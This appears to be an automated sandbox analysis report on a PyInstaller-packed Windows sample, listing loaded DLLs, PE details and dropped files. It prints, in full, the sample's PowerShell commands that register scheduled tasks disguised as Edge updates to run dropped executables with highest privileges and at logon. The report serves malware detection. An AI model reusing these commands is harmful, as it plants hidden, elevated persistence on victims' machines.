Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeAutomated click: Accept
Source: C:\$Windows.~WS\Sources\SetupHost.exeAutomated click: Next
Source: C:\Users\user\AppData\LineInst.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: T1#U52a9#U624b1.0.1.exeStatic file information: File size 38135059 > 1048576
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a01\_work\6\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658685678.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786622693.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1829720428.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801496747.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1838603027.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SetupPrep.pdbGCTL source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1685436843.0000029E76B04000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000003.1754464189.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000000.1745430758.0000000000A71000.00000020.00000001.01000000.0000000A.sdmp, LineInst.exe, 0000000B.00000003.1748979428.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000003.1754333515.00000000038F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WdsClientApi.pdbGCTL source: wdsclientapi.dll.11.dr
Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795089608.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1831179551.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786800951.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1830445848.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WdsClientApi.pdb source: wdsclientapi.dll.11.dr
Source: Binary string: SetupPlatform.pdb source: setupplatform.dll.11.dr
Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1830735495.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SetupHost.pdbGCTL source: SetupHost.exe, 0000000D.00000000.1779120957.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: SetupPlatform.pdbGCTL source: setupplatform.dll.11.dr
Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795346506.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1831564639.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SetupHost.pdb source: SetupHost.exe, SetupHost.exe, 0000000D.00000000.1779120957.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: SetupPrep.pdb source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1685436843.0000029E76B04000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, LineInst.exe, 0000000B.00000003.1754464189.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000000.1745430758.0000000000A71000.00000020.00000001.01000000.0000000A.sdmp, LineInst.exe, 0000000B.00000003.1748979428.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000003.1754333515.00000000038F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795089608.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1831179551.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B5C000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801728812.000001F51FAD3000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1838911809.000001E3DC93E000.00000004.00000020.00020000.00000000.sdmp
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' "
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../WinHex.exe'; $Trigger = New-ScheduledTaskTrigger -AtLogon; $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnceMe' -Description 'MicrosoftEdgeUpdatesOnce once You' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnceMe' "
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../LineInst.exe'; $Trigger = New-ScheduledTaskTrigger -Once -At (Get-Date); $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnce' -Description 'MicrosoftEdgeUpdatesOnce once' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnce' "Jump to behavior
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\../WinHex.exe'; $Trigger = New-ScheduledTaskTrigger -AtLogon; $Principal = New-ScheduledTaskPrincipal -UserId 'user' -LogonType Interactive -RunLevel Highest; Register-ScheduledTask -Action $Action -Trigger $Trigger -Principal $Principal -TaskName 'MicrosoftEdgeUpdatesOnceMe' -Description 'MicrosoftEdgeUpdatesOnce once You' -Force; Start-ScheduledTask -TaskName 'MicrosoftEdgeUpdatesOnceMe' "Jump to behavior
Source: DU.dll.11.drStatic PE information: 0xC4ED75F0 [Tue Sep 11 13:02:40 2074 UTC]
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0053DE32 __EH_prolog3_GS,memset,memset,memset,memset,memset,RtlGetVersion,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,SetLastError,GetLastError,LoadLibraryW,GetProcAddress,GlobalFree,GetLastError,GetLastError,RegOpenKeyExW,RegCloseKey,CompareStringW,CompareStringW,GetLastError,GetLastError,FreeLibrary,RegCloseKey,13_2_0053DE32
Source: T1#U52a9#U624b1.0.1.exeStatic PE information: section name: _RDATA
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
Source: LineInst.exe.1.drStatic PE information: section name: .boxload
Source: WinHex.exe.1.drStatic PE information: section name: _RDATA
Source: SystemUpdate.exe.1.drStatic PE information: section name: _RDATA
Source: DU.dll.11.drStatic PE information: section name: .didat
Source: DiagTrack.dll.11.drStatic PE information: section name: .didat
Source: Diager.dll.11.drStatic PE information: section name: .didat
Source: setupplatform.dll.11.drStatic PE information: section name: .didat
Source: unbcl.dll.11.drStatic PE information: section name: .didat
Source: wdsutil.dll.11.drStatic PE information: section name: .didat
Source: libcrypto-1_1.dll.12.drStatic PE information: section name: .00cfg
Source: libssl-1_1.dll.12.drStatic PE information: section name: .00cfg
Source: VCRUNTIME140.dll.12.drStatic PE information: section name: _RDATA
Source: VCRUNTIME140.dll.19.drStatic PE information: section name: _RDATA
Source: libcrypto-1_1.dll.19.drStatic PE information: section name: .00cfg
Source: libssl-1_1.dll.19.drStatic PE information: section name: .00cfg
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67810CC push rbp; retn 0000h0_2_00007FF7A67810CD
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeCode function: 0_2_00007FF7A67810E4 push rcx; retn 0000h0_2_00007FF7A67810ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B29D2A5 pushad ; iretd 2_2_00007FFD9B29D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B2BD2A5 pushad ; iretd 4_2_00007FFD9B2BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B3D8CFD push ebx; retf 000Ch4_2_00007FFD9B3D8D0A
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5C210E4 push rcx; retn 0000h12_2_00007FF7C5C210ED
Source: C:\Users\user\AppData\WinHex.exeCode function: 12_2_00007FF7C5C210CC push rbp; retn 0000h12_2_00007FF7C5C210CD
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_004C43D8 pushad ; iretd 13_2_004C43D9
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 13_2_0054F390 push ecx; ret 13_2_0054F3A3
Source: pidgenx.dll.11.drStatic PE information: section name: .text entropy: 6.807645664658098

Persistence and Installation Behavior

barindex
Found pyInstaller with non standard icon
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeProcess created: "C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe"
Source: C:\Users\user\AppData\WinHex.exeProcess created: C:\Users\user\AppData\Roaming\../WinHex.exe
Source: C:\Users\user\AppData\SystemUpdate.exeProcess created: C:\Users\user\AppData\SystemUpdate.exe
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80722\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80722\libssl-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80722\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\select.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\wdstptc.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\DiagTrack.dllJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80722\select.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\wdsclientapi.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\wdscore.dllJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\SetupHost.exeJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\LineInst.exeJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\unbcl.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80722\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\SystemUpdate.exeJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\WinDlp.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\WinHex.exeJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80722\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\SetupMgr.dllJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\wdscsl.dllJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\wpx.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\python38.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\libcrypto-1_1.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\AppData\LineInst.exeFile created: C:\$Windows.~WS\Sources\setupplatform.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73322\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80722\python38.dllJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\AppData\WinHex.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\AppData\SystemUpdate.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80722\_lzma.pydJump to dropped file
